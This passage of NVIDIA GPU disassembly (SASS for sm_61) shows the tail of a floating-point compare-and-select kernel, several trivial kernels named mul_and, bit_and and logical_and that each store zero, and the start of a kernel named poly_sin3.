/*0608*/ DSETP.GT.AND P2, PT, R10, R36, PT ; /* 0x5b84038002470a17 */
/*0610*/ SEL R5, R3, R13, P1 ; /* 0x5ca0008000d70305 */
/*0618*/ SEL R31, R13, R3, P1 ; /* 0x5ca0008000370d1f */
/* 0x001ec400fc404712 */
/*0628*/ DADD R18, R18, +QNAN ; /* 0x3870007ff8071212 */
/*0630*/ IADD.X R13, R2, c[0x0][0x144] ; /* 0x4c1008000517020d */
/*0638*/ LDG.E R13, [R12] ; /* 0xeed4200000070c0d */
/* 0x005fc4010e800153 */
/*0648*/ DFMA R30, R4, 2, R30 ; /* 0x36700f400007041e */
/*0650*/ DADD R20, R18, R20 ; /* 0x5c70000001471214 */
/*0658*/ SEL R4, R10, R36, P2 ; /* 0x5ca0010002470a04 */
/* 0x001fc400fe200fe1 */
/*0668*/ SEL R18, R36, R10, P2 ; /* 0x5ca0010000a72412 */
/*0670*/ IADD32I R10, R27, 0x7 ; /* 0x1c00000000771b0a */
/*0678*/ SEL R5, R11, R37, P2 ; /* 0x5ca0010002570b05 */
/* 0x001f9840fe2007fd */
/*0688*/ SEL R19, R37, R11, P2 ; /* 0x5ca0010000b72513 */
/*0690*/ SHR.U32 R11, R10.reuse, 0x1e ; /* 0x3828000001e70a0b */
/*0698*/ ISCADD R10.CC, R10, c[0x0][0x140], 0x2 ; /* 0x4c18810005070a0a */
/* 0x001fcc00f6a007e2 */
/*06a8*/ IADD.X R11, R11, c[0x0][0x144] ; /* 0x4c10080005170b0b */
/*06b0*/ LDG.E R12, [R10] ; /* 0xeed4200000070a0c */
/*06b8*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/* 0x001fc400fe240711 */
/*06c8*/ F2F.F64.F32 R6, R22.reuse ; /* 0x5ca8000001670b06 */
/*06d0*/ SEL R32, R14, R8, P0 ; /* 0x5ca0000000870e20 */
/*06d8*/ SEL R33, R15, R9, P0 ; /* 0x5ca0000000970f21 */
/* 0x081fc401e30007e5 */
/*06e8*/ FSETP.GT.AND P1, PT, R16, R22, PT ; /* 0x5bb403800167100f */
/*06f0*/ DSETP.GT.AND P3, PT, R32, R6, PT ; /* 0x5b8403800067201f */
/*06f8*/ SEL R34, R8.reuse, R6, P1 ; /* 0x5ca0008000670822 */
/* 0x001fc401fe2007f6 */
/*0708*/ SEL R35, R9, R7, P1 ; /* 0x5ca0008000770923 */
/*0710*/ SEL R32, R6, R32, P3 ; /* 0x5ca0018002070620 */
/*0718*/ SEL R33, R7, R33, P3 ; /* 0x5ca0018002170721 */
/* 0x001fd400fe2007e1 */
/*0728*/ SEL R14, R8, R14, P0 ; /* 0x5ca0000000e7080e */
/*0730*/ SEL R15, R9, R15, P0 ; /* 0x5ca0000000f7090f */
/*0738*/ SEL R2, R6, R8, P1 ; /* 0x5ca0008000870602 */
/* 0x0000c400fe200711 */
/*0748*/ DSETP.GT.AND P0, PT, R14, R32, PT ; /* 0x5b84038002070e07 */
/*0750*/ SEL R3, R7, R9, P1 ; /* 0x5ca0008000970703 */
/*0758*/ DFMA R18, R4, 2, R18 ; /* 0x3670094000070412 */
/* 0x003fc404eb604761 */
/*0768*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/*0770*/ DADD R30, R30, +QNAN ; /* 0x3870007ff8071e1e */
/*0778*/ SEL R4, R14, R32, P0 ; /* 0x5ca0000002070e04 */
/* 0x00814408ebc007f1 */
/*0788*/ SEL R38, R32, R14, P0 ; /* 0x5ca0000000e72026 */
/*0790*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/*0798*/ DADD R20, R30, R20 ; /* 0x5c70000001471e14 */
/* 0x001fdc00ec2007f3 */
/*07a8*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/*07b0*/ F2F.F64.F32 R16, R13 ; /* 0x5ca8000000d70b10 */
/*07b8*/ FSETP.GT.AND P2, PT, R22, R13, PT ; /* 0x5bb4038000d71617 */
/* 0x001fc400fea04771 */
/*07c8*/ DSETP.GT.AND P3, PT, R34, R16, PT ; /* 0x5b8403800107221f */
/*07d0*/ IADD32I R22, R27, 0x8 ; /* 0x1c00000000871b16 */
/*07d8*/ SEL R36, R6, R16, P2 ; /* 0x5ca0010001070624 */
/* 0x001fc408fc2007f8 */
/*07e8*/ SEL R37, R7, R17, P2 ; /* 0x5ca0010001170725 */
/*07f0*/ SEL R8, R16, R34, P3 ; /* 0x5ca0018002271008 */
/*07f8*/ SEL R9, R17, R35, P3 ; /* 0x5ca0018002371109 */
/* 0x001fd840fe210771 */
/*0808*/ F2F.F64.F32 R34, R12 ; /* 0x5ca8000000c70b22 */
/*0810*/ SHR.U32 R14, R22.reuse, 0x1e ; /* 0x3828000001e7160e */
/*0818*/ ISCADD R22.CC, R22, c[0x0][0x140], 0x2 ; /* 0x4c18810005071616 */
/* 0x001f8800e0204771 */
/*0828*/ DSETP.GT.AND P3, PT, R36, R34, PT ; /* 0x5b8403800227241f */
/*0830*/ DSETP.GT.AND P1, PT, R2, R8, PT ; /* 0x5b8403800087020f */
/*0838*/ IADD.X R23, R14, c[0x0][0x144] ; /* 0x4c10080005170e17 */
/* 0x001fc408fc2007bb */
/*0848*/ LDG.E R23, [R22] ; /* 0xeed4200000071617 */
/*0850*/ SEL R10, R34, R36, P3 ; /* 0x5ca001800247220a */
/*0858*/ IADD32I R36, R27, 0x9 ; /* 0x1c00000000971b24 */
/* 0x081fc400fe800ff1 */
/*0868*/ SEL R30, R2, R8, P1 ; /* 0x5ca000800087021e */
/*0870*/ SEL R32, R8, R2, P1 ; /* 0x5ca0008000270820 */
/*0878*/ SHR.U32 R2, R36.reuse, 0x1e ; /* 0x3828000001e72402 */
/* 0x001f8800fca007f1 */
/*0888*/ ISCADD R36.CC, R36, c[0x0][0x140], 0x2 ; /* 0x4c18810005072424 */
/*0890*/ SEL R11, R35, R37, P3 ; /* 0x5ca001800257230b */
/*0898*/ IADD.X R37, R2, c[0x0][0x144] ; /* 0x4c10080005170225 */
/* 0x005cdc04e22007b1 */
/*08a8*/ LDG.E R22, [R36] ; /* 0xeed4200000072416 */
/*08b0*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/*08b8*/ DADD R18, R18, +QNAN ; /* 0x3870007ff8071212 */
/* 0x001ff400fe200f31 */
/*08c8*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/*08d0*/ SEL R5, R15, R33, P0 ; /* 0x5ca0000002170f05 */
/*08d8*/ SEL R39, R33, R15, P0 ; /* 0x5ca0000000f72127 */
/* 0x003c4400e6e01701 */
/*08e8*/ DADD R20, R18, R20 ; /* 0x5c70000001471214 */
/*08f0*/ DFMA R38, R4, 2, R38 ; /* 0x3670134000070426 */
/*08f8*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/* 0x003cc400fec01731 */
/*0908*/ DADD R38, R38, +QNAN ; /* 0x3870007ff8072626 */
/*0910*/ SEL R6, R16, R6, P2 ; /* 0x5ca0010000671006 */
/*0918*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/* 0x001fd400fe2007e1 */
/*0928*/ SEL R7, R17, R7, P2 ; /* 0x5ca0010000771107 */
/*0930*/ FSETP.GT.AND P2, PT, R13, R12, PT ; /* 0x5bb4038000c70d17 */
/*0938*/ SEL R31, R3, R9, P1 ; /* 0x5ca000800097031f */
/* 0x001cd400fe201711 */
/*0948*/ DADD R20, R38, R20 ; /* 0x5c70000001472614 */
/*0950*/ SEL R33, R9, R3, P1 ; /* 0x5ca0008000370921 */
/*0958*/ DSETP.GT.AND P0, PT, R6, R10, PT ; /* 0x5b84038000a70607 */
/* 0x001fc401e2200741 */
/*0968*/ DFMA R32, R30, 2, R32 ; /* 0x3670104000071e20 */
/*0970*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/*0978*/ SEL R18, R16, R34, P2 ; /* 0x5ca0010002271012 */
/* 0x009d4400fe8007f1 */
/*0988*/ SEL R19, R17, R35, P2 ; /* 0x5ca0010002371113 */
/*0990*/ SEL R14, R34, R16, P2 ; /* 0x5ca001000107220e */
/*0998*/ DADD R32, R32, +QNAN ; /* 0x3870007ff8072020 */
/* 0x005fc400fe200f41 */
/*09a8*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/*09b0*/ SEL R15, R35, R17, P2 ; /* 0x5ca001000117230f */
/*09b8*/ SEL R30, R10, R6, P0 ; /* 0x5ca0000000670a1e */
/* 0x001f8404062007f5 */
/*09c8*/ SEL R13, R7, R11, P0 ; /* 0x5ca0000000b7070d */
/*09d0*/ DADD R20, R32, R20 ; /* 0x5c70000001472014 */
/*09d8*/ SEL R31, R11, R7, P0 ; /* 0x5ca0000000770b1f */
/* 0x003c4402e3c00ff6 */
/*09e8*/ IADD32I R32, R27, 0xa ; /* 0x1c00000000a71b20 */
/*09f0*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/*09f8*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/* 0x101cc400fe6007e1 */
/*0a08*/ IADD32I R29, R27, 0xc ; /* 0x1c00000000c71b1d */
/*0a10*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/*0a18*/ F2F.F64.F32 R4, R23.reuse ; /* 0x5ca8000001770b04 */
/* 0x001fc402e62007f7 */
/*0a28*/ FSETP.GT.AND P2, PT, R12, R23, PT ; /* 0x5bb4038001770c17 */
/*0a30*/ DSETP.GT.AND P3, PT, R18, R4, PT ; /* 0x5b8403800047121f */
/*0a38*/ SEL R12, R6, R10, P0 ; /* 0x5ca0000000a7060c */
/* 0x001fc400fe6007e1 */
/*0a48*/ SHR.U32 R6, R32, 0x1e ; /* 0x3828000001e72006 */
/*0a50*/ ISCADD R32.CC, R32, c[0x0][0x140], 0x2 ; /* 0x4c18810005072020 */
/*0a58*/ SEL R2, R34, R4, P2 ; /* 0x5ca0010000472202 */
/* 0x005fc400fee00751 */
/*0a68*/ DFMA R30, R12, 2, R30 ; /* 0x36700f4000070c1e */
/*0a70*/ SEL R3, R35, R5, P2 ; /* 0x5ca0010000572303 */
/*0a78*/ SEL R18, R4, R18, P3 ; /* 0x5ca0018001270412 */
/* 0x001fd020e62007e1 */
/*0a88*/ SEL R19, R5, R19, P3 ; /* 0x5ca0018001370513 */
/*0a90*/ F2F.F64.F32 R16, R22 ; /* 0x5ca8000001670b10 */
/*0a98*/ IADD.X R33, R6, c[0x0][0x144] ; /* 0x4c10080005170621 */
/* 0x009c4800f6200770 */
/*0aa8*/ { DSETP.GT.AND P1, PT, R14, R18, PT ; /* 0x5b84038001270e0f */
/*0ab0*/ LDG.E R25, [R32] }
/* 0xeed4200000072019 */
/*0ab8*/ DADD R30, R30, +QNAN ; /* 0x3870007ff8071e1e */
/* 0x003fc40108401736 */
/*0ac8*/ DSETP.GT.AND P3, PT, R2, R16, PT ; /* 0x5b8403800107021f */
/*0ad0*/ DADD R20, R30, R20 ; /* 0x5c70000001471e14 */
/*0ad8*/ IADD32I R30, R27, 0xb ; /* 0x1c00000000b71b1e */
/* 0x011fc400fe4007f1 */
/*0ae8*/ SEL R8, R4, R34, P2 ; /* 0x5ca0010002270408 */
/*0af0*/ SEL R9, R5, R35, P2 ; /* 0x5ca0010002370509 */
/*0af8*/ SEL R12, R14, R18, P1 ; /* 0x5ca0008001270e0c */
/* 0x001fc402fc2007f2 */
/*0b08*/ SEL R18, R18, R14, P1 ; /* 0x5ca0008000e71212 */
/*0b10*/ SEL R2, R16, R2, P3 ; /* 0x5ca0018000271002 */
/*0b18*/ SEL R3, R17, R3, P3 ; /* 0x5ca0018000371103 */
/* 0x001c4400fe8207f1 */
/*0b28*/ SHR.U32 R14, R30.reuse, 0x1e ; /* 0x3828000001e71e0e */
/*0b30*/ ISCADD R30.CC, R30, c[0x0][0x140], 0x2 ; /* 0x4c18810005071e1e */
/*0b38*/ DSETP.GT.AND P0, PT, R8, R2, PT ; /* 0x5b84038000270807 */
/* 0x001f8800fc2007f1 */
/*0b48*/ SEL R13, R15, R19, P1 ; /* 0x5ca0008001370f0d */
/*0b50*/ SEL R19, R19, R15, P1 ; /* 0x5ca0008000f71313 */
/*0b58*/ IADD.X R31, R14, c[0x0][0x144] ; /* 0x4c10080005170e1f */
/* 0x001d5c04e64007b1 */
/*0b68*/ LDG.E R26, [R30] ; /* 0xeed4200000071e1a */
/*0b70*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/*0b78*/ DFMA R18, R12, 2, R18 ; /* 0x3670094000070c12 */
/* 0x001f8402e2200ff1 */
/*0b88*/ SEL R14, R8, R2, P0 ; /* 0x5ca000000027080e */
/*0b90*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/*0b98*/ SEL R15, R9, R3, P0 ; /* 0x5ca000000037090f */
/* 0x001fc400fe202711 */
/*0ba8*/ DADD R18, R18, +QNAN ; /* 0x3870007ff8071212 */
/*0bb0*/ SEL R8, R2, R8, P0 ; /* 0x5ca0000000870208 */
/*0bb8*/ SEL R9, R3, R9, P0 ; /* 0x5ca0000000970309 */
/* 0x00208800fe8207f1 */
/*0bc8*/ SHR.U32 R3, R29.reuse, 0x1e ; /* 0x3828000001e71d03 */
/*0bd0*/ ISCADD R2.CC, R29, c[0x0][0x140], 0x2 ; /* 0x4c18810005071d02 */
/*0bd8*/ DADD R18, R18, R20 ; /* 0x5c70000001471212 */
/* 0x001ecc00fc400fe1 */
/*0be8*/ IADD32I R20, R27, 0xd ; /* 0x1c00000000d71b14 */
/*0bf0*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/*0bf8*/ LDG.E R3, [R2] ; /* 0xeed4200000070203 */
/* 0x001f8800fcc207f1 */
/*0c08*/ SHR.U32 R21, R20.reuse, 0x1e ; /* 0x3828000001e71415 */
/*0c10*/ ISCADD R20.CC, R20, c[0x0][0x140], 0x2 ; /* 0x4c18810005071414 */
/*0c18*/ IADD.X R21, R21, c[0x0][0x144] ; /* 0x4c10080005171515 */
/* 0x001fc400fda000b1 */
/*0c28*/ LDG.E R20, [R20] ; /* 0xeed4200000071414 */
/*0c30*/ FSETP.GT.AND P2, PT, R23, R22, PT ; /* 0x5bb4038001671717 */
/*0c38*/ SEL R10, R4, R16, P2 ; /* 0x5ca001000107040a */
/* 0x001fc400fe2007f1 */
/*0c48*/ SEL R11, R5, R17, P2 ; /* 0x5ca001000117050b */
/*0c50*/ SEL R4, R16, R4, P2 ; /* 0x5ca0010000471004 */
/*0c58*/ SEL R5, R17, R5, P2 ; /* 0x5ca0010000571105 */
/* 0x009d4402e7c00741 */
/*0c68*/ DFMA R8, R14, 2, R8 ; /* 0x3670044000070e08 */
/*0c70*/ F2F.F32.F64 R18, R18 ; /* 0x5ca8000001270e12 */
/*0c78*/ DADD R8, R8, +QNAN ; /* 0x3870007ff8070808 */
/* 0x0020c404e3c0175e */
/*0c88*/ F2F.F64.F32 R18, R18 ; /* 0x5ca8000001270b12 */
/*0c90*/ DADD R18, R8, R18 ; /* 0x5c70000001270812 */
/*0c98*/ F2F.F32.F64 R21, R18 ; /* 0x5ca8000001270e15 */
/* 0x001fcc00fc2007e1 */
/*0ca8*/ IADD32I R28, R28, 0xc ; /* 0x1c00000000c71c1c */
/*0cb0*/ MOV R27, R29 ; /* 0x5c98078001d7001b */
/*0cb8*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/* 0x009d5800fee40751 */
/*0cc8*/ F2F.F64.F32 R6, R25.reuse ; /* 0x5ca8000001970b06 */
/*0cd0*/ FSETP.GT.AND P2, PT, R22, R25, PT ; /* 0x5bb4038001971617 */
/*0cd8*/ DSETP.GT.AND P3, PT, R10, R6, PT ; /* 0x5b84038000670a1f */
/* 0x009ff400fd0007f1 */
/*0ce8*/ SEL R22, R16, R6, P2 ; /* 0x5ca0010000671016 */
/*0cf0*/ SEL R23, R17, R7, P2 ; /* 0x5ca0010000771117 */
/*0cf8*/ SEL R10, R6, R10, P3 ; /* 0x5ca0018000a7060a */
/* 0x001d4c00fe6207f0 */
/*0d08*/ { SEL R11, R7.reuse, R11, P3 ; /* 0x5ca0018000b7070b */
/*0d10*/ DEPBAR.LE SB5, 0x2 }
/* 0xf0f0000034270000 */
/*0d18*/ F2F.F64.F32 R12, R26 ; /* 0x5ca8000001a70b0c */
/* 0x001f8c00fe200771 */
/*0d28*/ DSETP.GT.AND P1, PT, R4, R10, PT ; /* 0x5b84038000a7040f */
/*0d30*/ SEL R16, R6, R16, P2 ; /* 0x5ca0010001070610 */
/*0d38*/ SEL R17, R7, R17, P2 ; /* 0x5ca0010001170711 */
/* 0x011fc400ff202751 */
/*0d48*/ DSETP.GT.AND P3, PT, R22, R12, PT ; /* 0x5b84038000c7161f */
/*0d50*/ FSETP.GT.AND P2, PT, R25, R26, PT ; /* 0x5bb4038001a71917 */
/*0d58*/ SEL R2, R4, R10, P1 ; /* 0x5ca0008000a70402 */
/* 0x001fcc04fe0007f4 */
/*0d68*/ SEL R4, R10, R4, P1 ; /* 0x5ca0008000470a04 */
/*0d70*/ { SEL R22, R12, R22, P3 ; /* 0x5ca0018001670c16 */
/*0d78*/ DEPBAR.LE SB5, 0x1 }
/* 0xf0f0000034170000 */
/* 0x009fc400fe200261 */
/*0d88*/ F2F.F64.F32 R14, R3 ; /* 0x5ca8000000370b0e */
/*0d90*/ FSETP.GT.AND P0, PT, R26, R3, PT ; /* 0x5bb4038000371a07 */
/*0d98*/ SEL R3, R5, R11, P1 ; /* 0x5ca0008000b70503 */
/* 0x001fc400fe2007f1 */
/*0da8*/ SEL R5, R11, R5, P1 ; /* 0x5ca0008000570b05 */
/*0db0*/ SEL R23, R13, R23, P3 ; /* 0x5ca0018001770d17 */
/*0db8*/ SEL R30, R6, R12, P2 ; /* 0x5ca0010000c7061e */
/* 0x001e3400ea2007e3 */
/*0dc8*/ SEL R31, R7, R13, P2 ; /* 0x5ca0010000d7071f */
/*0dd0*/ DFMA R2, R2, 2, R4 ; /* 0x3670024000070202 */
/*0dd8*/ DSETP.GT.AND P4, PT, R16, R22, PT ; /* 0x5b84038001671027 */
/* 0x005cc408ee210911 */
/*0de8*/ F2F.F64.F32 R18, R20 ; /* 0x5ca8000001470b12 */
/*0df0*/ DSETP.GT.AND P3, PT, R30, R14, PT ; /* 0x5b84038000e71e1f */
/*0df8*/ F2F.F64.F32 R20, R21 ; /* 0x5ca8000001570b14 */
/* 0x001fd800fc202731 */
/*0e08*/ DADD R2, R2, +QNAN ; /* 0x3870007ff8070202 */
/*0e10*/ SEL R10, R12, R6, P2 ; /* 0x5ca0010000670c0a */
/*0e18*/ SEL R11, R13, R7, P2 ; /* 0x5ca0010000770d0b */
/* 0x001fc410fe201151 */
/*0e28*/ DADD R20, R2, R20 ; /* 0x5c70000001470214 */
/*0e30*/ SEL R6, R16, R22, P4 ; /* 0x5ca0020001671006 */
/*0e38*/ SEL R7, R17, R23, P4 ; /* 0x5ca0020001771107 */
/* 0x091fc400fc2007f1 */
/*0e48*/ SEL R16, R22, R16, P4 ; /* 0x5ca0020001071610 */
/*0e50*/ SEL R17, R23, R17, P4 ; /* 0x5ca0020001171711 */
/*0e58*/ SEL R4, R14.reuse, R30, P3 ; /* 0x5ca0018001e70e04 */
/* 0x001dc400fe6007f1 */
/*0e68*/ SEL R5, R15, R31, P3 ; /* 0x5ca0018001f70f05 */
/*0e70*/ SEL R8, R12, R14, P0 ; /* 0x5ca0000000e70c08 */
/*0e78*/ DFMA R6, R6, 2, R16 ; /* 0x3670084000070606 */
/* 0x009cc402fc2007f1 */
/*0e88*/ SEL R9, R13, R15, P0 ; /* 0x5ca0000000f70d09 */
/*0e90*/ SEL R2, R14, R12, P0 ; /* 0x5ca0000000c70e02 */
/*0e98*/ F2F.F32.F64 R12, R20 ; /* 0x5ca8000001470e0c */
/* 0x001fc401e2200753 */
/*0ea8*/ DSETP.GT.AND P1, PT, R10, R4, PT ; /* 0x5b84038000470a0f */
/*0eb0*/ DSETP.GT.AND P2, PT, R8, R18, PT ; /* 0x5b84038001270817 */
/*0eb8*/ SEL R3, R15, R13, P0 ; /* 0x5ca0000000d70f03 */
/* 0x011cc402ed004772 */
/*0ec8*/ DADD R6, R6, +QNAN ; /* 0x3870007ff8070606 */
/*0ed0*/ F2F.F64.F32 R12, R12 ; /* 0x5ca8000000c70b0c */
/*0ed8*/ DADD R6, R6, R12 ; /* 0x5c70000000c70606 */
/* 0x001fc400fe2027f1 */
/*0ee8*/ SEL R14, R10, R4, P1 ; /* 0x5ca0008000470a0e */
/*0ef0*/ SEL R15, R11, R5, P1 ; /* 0x5ca0008000570b0f */
/*0ef8*/ SEL R4, R4, R10, P1 ; /* 0x5ca0008000a70404 */
/* 0x001fc801fc2007f1 */
/*0f08*/ SEL R5, R5, R11, P1 ; /* 0x5ca0008000b70505 */
/*0f10*/ SEL R8, R18, R8, P2 ; /* 0x5ca0010000871208 */
/*0f18*/ SEL R9, R19, R9, P2 ; /* 0x5ca0010000971309 */
/* 0x001d4400e7a01712 */
/*0f28*/ F2F.F32.F64 R6, R6 ; /* 0x5ca8000000670e06 */
/*0f30*/ DFMA R4, R14, 2, R4 ; /* 0x3670024000070e04 */
/*0f38*/ DSETP.GT.AND P0, PT, R2, R8, PT ; /* 0x5b84038000870207 */
/* 0x003c1402e3000f11 */
/*0f48*/ F2F.F64.F32 R6, R6 ; /* 0x5ca8000000670b06 */
/*0f50*/ DADD R4, R4, +QNAN ; /* 0x3870007ff8070404 */
/*0f58*/ DADD R4, R4, R6 ; /* 0x5c70000000670404 */
/* 0x001fc400fe2027f1 */
/*0f68*/ SEL R10, R2, R8, P0 ; /* 0x5ca000000087020a */
/*0f70*/ SEL R11, R3, R9, P0 ; /* 0x5ca000000097030b */
/*0f78*/ SEL R8, R8, R2, P0 ; /* 0x5ca0000000270808 */
/* 0x001c8c01e2a007f1 */
/*0f88*/ SEL R9, R9, R3, P0 ; /* 0x5ca0000000370909 */
/*0f90*/ F2F.F32.F64 R4, R4 ; /* 0x5ca8000000470e04 */
/*0f98*/ DFMA R2, R10, 2, R8 ; /* 0x3670044000070a02 */
/* 0x001fdc02e2200f15 */
/*0fa8*/ F2F.F64.F32 R4, R4 ; /* 0x5ca8000000470b04 */
/*0fb0*/ DADD R2, R2, +QNAN ; /* 0x3870007ff8070202 */
/*0fb8*/ ISETP.NE.AND P0, PT, R28, RZ, PT ; /* 0x5b6b03800ff71c07 */
/* 0x001ff80106000f18 */
/*0fc8*/ DADD R2, R2, R4 ; /* 0x5c70000000470202 */
/*0fd0*/ { F2F.F32.F64 R20, R2 ; /* 0x5ca8000000270e14 */
/*0fd8*/ @P0 BRA 0x2d8 }
/* 0xe2400fff2f80000f */
/* 0x001f8801fcc007e1 */
/*0fe8*/ SHR R0, R0, 0x1e ; /* 0x3829000001e70000 */
/*0ff0*/ IADD R2.CC, R24, c[0x0][0x150] ; /* 0x4c10800005471802 */
/*0ff8*/ IADD.X R3, R0, c[0x0][0x154] ; /* 0x4c10080005570003 */
/* 0x001ffc00ffe017f5 */
/*1008*/ STG.E [R2], R20 ; /* 0xeedc200000070214 */
/*1010*/ EXIT ; /* 0xe30000000007000f */
/*1018*/ BRA 0x1018 ; /* 0xe2400fffff87000f */
/* 0x001f8000fc0007e0 */
/*1028*/ NOP; /* 0x50b0000000070f00 */
/*1030*/ NOP; /* 0x50b0000000070f00 */
/*1038*/ NOP; /* 0x50b0000000070f00 */
...........................
Function : _Z7mul_andPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001cfc00e22007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ S2R R2, SR_CTAID.X ; /* 0xf0c8000002570002 */
/*0018*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/* 0x001fd802fcc00fe1 */
/*0028*/ XMAD.MRG R3, R2, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270203 */
/*0030*/ XMAD R0, R2, c[0x0] [0x8], R0 ; /* 0x4e00000000270200 */
/*0038*/ XMAD.PSL.CBCC R2, R2.H1, R3.H1, R0 ; /* 0x5b30001800370202 */
/* 0x001f8800fcc207f1 */
/*0048*/ SHR R0, R2.reuse, 0x1e ; /* 0x3829000001e70200 */
/*0050*/ ISCADD R2.CC, R2, c[0x0][0x150], 0x2 ; /* 0x4c18810005470202 */
/*0058*/ IADD.X R3, R0, c[0x0][0x154] ; /* 0x4c10080005570003 */
/* 0x001ffc00ffe007f5 */
/*0068*/ STG.E [R2], RZ ; /* 0xeedc2000000702ff */
/*0070*/ EXIT ; /* 0xe30000000007000f */
/*0078*/ BRA 0x78 ; /* 0xe2400fffff87000f */
..............................
Function : _Z7bit_andPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001cfc00e22007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ S2R R2, SR_CTAID.X ; /* 0xf0c8000002570002 */
/*0018*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/* 0x001fd802fcc00fe1 */
/*0028*/ XMAD.MRG R3, R2, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270203 */
/*0030*/ XMAD R0, R2, c[0x0] [0x8], R0 ; /* 0x4e00000000270200 */
/*0038*/ XMAD.PSL.CBCC R2, R2.H1, R3.H1, R0 ; /* 0x5b30001800370202 */
/* 0x001f8800fcc207f1 */
/*0048*/ SHR R0, R2.reuse, 0x1e ; /* 0x3829000001e70200 */
/*0050*/ ISCADD R2.CC, R2, c[0x0][0x150], 0x2 ; /* 0x4c18810005470202 */
/*0058*/ IADD.X R3, R0, c[0x0][0x154] ; /* 0x4c10080005570003 */
/* 0x001ffc00ffe007f5 */
/*0068*/ STG.E [R2], RZ ; /* 0xeedc2000000702ff */
/*0070*/ EXIT ; /* 0xe30000000007000f */
/*0078*/ BRA 0x78 ; /* 0xe2400fffff87000f */
..............................
Function : _Z11logical_andPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001cfc00e22007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ S2R R2, SR_CTAID.X ; /* 0xf0c8000002570002 */
/*0018*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/* 0x001fd802fcc00fe1 */
/*0028*/ XMAD.MRG R3, R2, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270203 */
/*0030*/ XMAD R0, R2, c[0x0] [0x8], R0 ; /* 0x4e00000000270200 */
/*0038*/ XMAD.PSL.CBCC R2, R2.H1, R3.H1, R0 ; /* 0x5b30001800370202 */
/* 0x001f8800fcc207f1 */
/*0048*/ SHR R0, R2.reuse, 0x1e ; /* 0x3829000001e70200 */
/*0050*/ ISCADD R2.CC, R2, c[0x0][0x150], 0x2 ; /* 0x4c18810005470202 */
/*0058*/ IADD.X R3, R0, c[0x0][0x154] ; /* 0x4c10080005570003 */
/* 0x001ffc00ffe007f5 */
/*0068*/ STG.E [R2], RZ ; /* 0xeedc2000000702ff */
/*0070*/ EXIT ; /* 0xe30000000007000f */
/*0078*/ BRA 0x78 ; /* 0xe2400fffff87000f */
...................................
Function : _Z9poly_sin3PKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV32I R21, 0xffffff00 ; /* 0x010ffffff007f015 */
/*0018*/ S2R R2, SR_CTAID.X }
/* 0xf0c8000002570002 */
/* 0x085fd841fe20073f */
/*0028*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/*0030*/ XMAD.MRG R3, R2.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270203 */
/*0038*/ XMAD R0, R2.reuse, c[0x0] [0x8], R0 ; /* 0x4e00000000270200 */
/* 0x001f9800fea007f1 */
/*0048*/ XMAD.PSL.CBCC R2, R2.H1, R3.H1, R0 ; /* 0x5b30001800370202 */
/*0050*/ MOV R0, RZ ; /* 0x5c9807800ff70000 */
/*0058*/ MOV R3, R2 ; /* 0x5c98078000270003 */
/* 0x081fc440fe2207f1 */
/*0068*/ SHR.U32 R4, R3.reuse, 0x1e ; /* 0x3828000001e70304 */
/*0070*/ IADD32I R10, R3.reuse, 0x1 ; /* 0x1c0000000017030a */
/*0078*/ ISCADD R8.CC, R3.reuse, c[0x0][0x140], 0x2 ; /* 0x4c18810005070308 */
/* 0x081fc000fe4007f5 */
/*0088*/ IADD32I R14, R3, 0x2 ; /* 0x1c0000000027030e */
/*0090*/ IADD.X R9, R4, c[0x0][0x144] ; /* 0x4c10080005170409 */
/*0098*/ { SHR.U32 R4, R10.reuse, 0x1e ; /* 0x3828000001e70a04 */
/* 0x081fc400fc2000b1 */
/*00a8*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*00b0*/ ISCADD R10.CC, R10, c[0x0][0x140], 0x2 ; /* 0x4c18810005070a0a */
/*00b8*/ IADD32I R18, R3.reuse, 0x3 ; /* 0x1c00000000370312 */
/* 0x001fc000fe4207f4 */
/*00c8*/ SHR.U32 R6, R14.reuse, 0x1e ; /* 0x3828000001e70e06 */
/*00d0*/ IADD.X R11, R4, c[0x0][0x144] ; /* 0x4c1008000517040b */
